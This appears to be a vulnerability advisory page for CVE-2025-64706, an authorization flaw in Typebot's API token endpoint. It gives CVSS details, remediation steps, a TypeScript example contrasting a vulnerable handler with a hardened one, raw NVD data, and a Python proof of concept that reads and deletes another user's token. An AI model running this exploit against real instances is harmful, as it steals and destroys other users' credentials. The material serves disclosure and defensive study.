Security Vulnerability Report
CVE-2025-64706 CVSS 5.0 MEDIUM

Published: 2025-11-13 18:15:56
Last Modified: 2026-01-30 14:14:34

Description

Typebot is an open-source chatbot builder. In version 3.9.0 up to but excluding version 3.13.0, an Insecure Direct Object Reference (IDOR) vulnerability exists in the API token management endpoint. An authenticated attacker can delete any user's API token and retrieve its value by simply knowing the target user's ID and token ID, without requiring authorization checks. Version 3.13.0 fixes the issue.

Any registered account is enough (PR:L); the only precondition beyond logging in is learning or guessing the victim's user ID and token ID, which is presumably why the vector carries AC:H. Because the read path discloses the token value itself, upgrading alone does not undo an exposure that has already happened: after moving to 3.13.0, revoke and reissue API tokens on instances that ran an affected version with untrusted registered users, and review API activity performed with those tokens.
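The authorization defect described above (CWE-639, a client-supplied key used directly as the lookup key) is easiest to see as a vulnerable handler beside its hardened form. The following TypeScript is an added illustration, not Typebot's code: the in-memory store, the user and token ids, the secrets, and the "metadata only on read" design choice are all constructed assumptions, and the function names stand in for whatever the real API token management endpoint is called.

```typescript
// Added illustration of the CWE-639 pattern behind CVE-2025-64706. This is
// NOT Typebot's code: store, types, ids and secrets are constructed, and the
// function names are stand-ins for an "API token management endpoint".

export interface ApiToken {
  id: string;
  ownerId: string;
  name: string;
  secret: string; // constructed; a real store should keep only a hash
}

export interface Session {
  userId: string; // the authenticated caller
}

export class NotFound extends Error {
  constructor(msg: string) {
    super(msg);
    this.name = "NotFound";
    Object.setPrototypeOf(this, NotFound.prototype); // keeps instanceof working on ES5 targets
  }
}

// Constructed fixture: two users, one token each. Fresh copy per call so
// the vulnerable and hardened paths can each be exercised from a clean state.
export function makeSampleStore(): Map<string, ApiToken> {
  return new Map<string, ApiToken>([
    ["tok_alice", { id: "tok_alice", ownerId: "user_alice", name: "ci", secret: "secret-alice-111" }],
    ["tok_bob", { id: "tok_bob", ownerId: "user_bob", name: "zapier", secret: "secret-bob-222" }],
  ]);
}

// VULNERABLE: authentication is checked (a session exists), but the
// client-supplied tokenId is used directly as the lookup key and is never
// compared with the session's user. Any logged-in user can read or delete
// any token whose id they know.
export function getTokenVulnerable(store: Map<string, ApiToken>, _session: Session, tokenId: string): ApiToken {
  const t = store.get(tokenId);
  if (t === undefined) throw new NotFound("token not found");
  return t; // hands ownerId and secret to a non-owner
}

export function deleteTokenVulnerable(store: Map<string, ApiToken>, _session: Session, tokenId: string): boolean {
  return store.delete(tokenId);
}

// HARDENED: every lookup is scoped to the authenticated user. A token that
// exists but belongs to someone else gets the same NotFound as a token that
// does not exist, so the endpoint cannot be used to enumerate valid ids.
function findOwnedToken(store: Map<string, ApiToken>, session: Session, tokenId: string): ApiToken {
  const t = store.get(tokenId);
  if (t === undefined || t.ownerId !== session.userId) {
    throw new NotFound("token not found");
  }
  return t;
}

export function getTokenHardened(store: Map<string, ApiToken>, session: Session, tokenId: string): { id: string; name: string } {
  const t = findOwnedToken(store, session, tokenId);
  // Assumed design choice, not a statement about Typebot: after creation the
  // read endpoint returns metadata only, so even a future authorization slip
  // cannot hand out a usable credential.
  return { id: t.id, name: t.name };
}

export function deleteTokenHardened(store: Map<string, ApiToken>, session: Session, tokenId: string): boolean {
  findOwnedToken(store, session, tokenId);
  return store.delete(tokenId);
}

export interface ScenarioResult {
  vulnerableLeakedSecret: string | null;
  vulnerableDeleted: boolean;
  hardenedReadDenied: boolean;
  hardenedDeleteDenied: boolean;
  hardenedStoreSize: number;
}

// The advisory's scenario: user_bob, an ordinary authenticated user, targets
// user_alice's token id. Returns what each implementation let through.
export function runScenario(): ScenarioResult {
  const attacker: Session = { userId: "user_bob" };
  const victimTokenId = "tok_alice";

  const vulnStore = makeSampleStore();
  const vulnerableLeakedSecret = getTokenVulnerable(vulnStore, attacker, victimTokenId).secret;
  const vulnerableDeleted = deleteTokenVulnerable(vulnStore, attacker, victimTokenId);

  const hardStore = makeSampleStore();
  let hardenedReadDenied = false;
  try {
    getTokenHardened(hardStore, attacker, victimTokenId);
  } catch (e) {
    if (!(e instanceof NotFound)) throw e;
    hardenedReadDenied = true;
  }
  let hardenedDeleteDenied = false;
  try {
    deleteTokenHardened(hardStore, attacker, victimTokenId);
  } catch (e) {
    if (!(e instanceof NotFound)) throw e;
    hardenedDeleteDenied = true;
  }
  return { vulnerableLeakedSecret, vulnerableDeleted, hardenedReadDenied, hardenedDeleteDenied, hardenedStoreSize: hardStore.size };
}
```

The check that matters is the single comparison in findOwnedToken: ownership is derived from the session, never from the request, and the "not yours" and "does not exist" cases are indistinguishable to the caller. Whether a read endpoint should return the secret at all is a separate design decision; the hardened read here returns metadata only, which is an assumption of this example rather than a description of the fixed Typebot release.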

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

The 5.0 MEDIUM figure above is the CNA (GitHub) assessment. NVD's own analysis, recorded in the raw data at the end of this page, keeps the same exploitability metrics but rates impact High on all three axes (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), for a base score of 7.5 HIGH. Since a retrieved API token lets the attacker act as the victim against the API, the NVD figure is the one to use when prioritising the upgrade.

Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key); the CNA additionally lists CWE-284 (Improper Access Control)

Configurations (Affected Products)

cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:* - VULNERABLE
Typebot >= 3.9.0 and < 3.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-64706 PoC - Typebot IDOR Vulnerability
# Target: Typebot API Token Management Endpoint
# The endpoint path used below is the one this PoC ships with; confirm it
# against the vendor advisory (GHSA-grx8-g27p-8hpp) for the version under test.
TARGET_URL = "http://target-typebot-instance.com"
ATTACKER_TOKEN = "attacker_auth_token_here"   # any valid credential for a low-privilege account
TARGET_USER_ID = "victim_user_id_here"         # named in the advisory; not used by this PoC's request path
TARGET_TOKEN_ID = "victim_api_token_id_here"

HEADERS = {
    "Authorization": f"Bearer {ATTACKER_TOKEN}",
    "Content-Type": "application/json",
}


def read_user_api_token():
    """Read any user's API token value without authorization."""
    endpoint = f"{TARGET_URL}/api/api-tokens/{TARGET_TOKEN_ID}"
    # IDOR: the server never verifies that the caller owns TARGET_TOKEN_ID
    response = requests.get(endpoint, headers=HEADERS)
    if response.status_code == 200:
        data = response.json()
        token_value = data.get("token", "")
        print(f"[+] Retrieved API Token: {token_value}")
        return token_value
    print(f"[-] Failed: {response.status_code}")
    return None


def delete_user_api_token():
    """Delete any user's API token without authorization."""
    endpoint = f"{TARGET_URL}/api/api-tokens/{TARGET_TOKEN_ID}"
    # IDOR: no check that the attacker owns this token
    response = requests.delete(endpoint, headers=HEADERS)
    if response.status_code == 200:
        print("[+] Successfully deleted victim's API token")
        return True
    print(f"[-] Failed: {response.status_code}")
    return False


if __name__ == "__main__":
    print("CVE-2025-64706 PoC - Typebot IDOR")
    print("=" * 50)
    # Read first: the delete step is destructive and removes the token being read.
    read_user_api_token()
    delete_user_api_token()

References

https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-grx8-g27p-8hpp (Vendor Advisory, Exploit)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64706",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-13T18:15:56.310",
    "lastModified": "2026-01-30T14:14:33.550",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Typebot is an open-source chatbot builder. In version 3.9.0 up to but excluding version 3.13.0, an Insecure Direct Object Reference (IDOR) vulnerability exists in the API token management endpoint. An authenticated attacker can delete any user's API token and retrieve its value by simply knowing the target user's ID and token ID, without requiring authorization checks. Version 3.13.0 fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 3.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-284"},
          {"lang": "en", "value": "CWE-639"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*",
                "versionStartIncluding": "3.9.0",
                "versionEndExcluding": "3.13.0",
                "matchCriteriaId": "FDE5EE9A-E1D5-4915-84D5-B4933DAEB0DF"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-grx8-g27p-8hpp",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}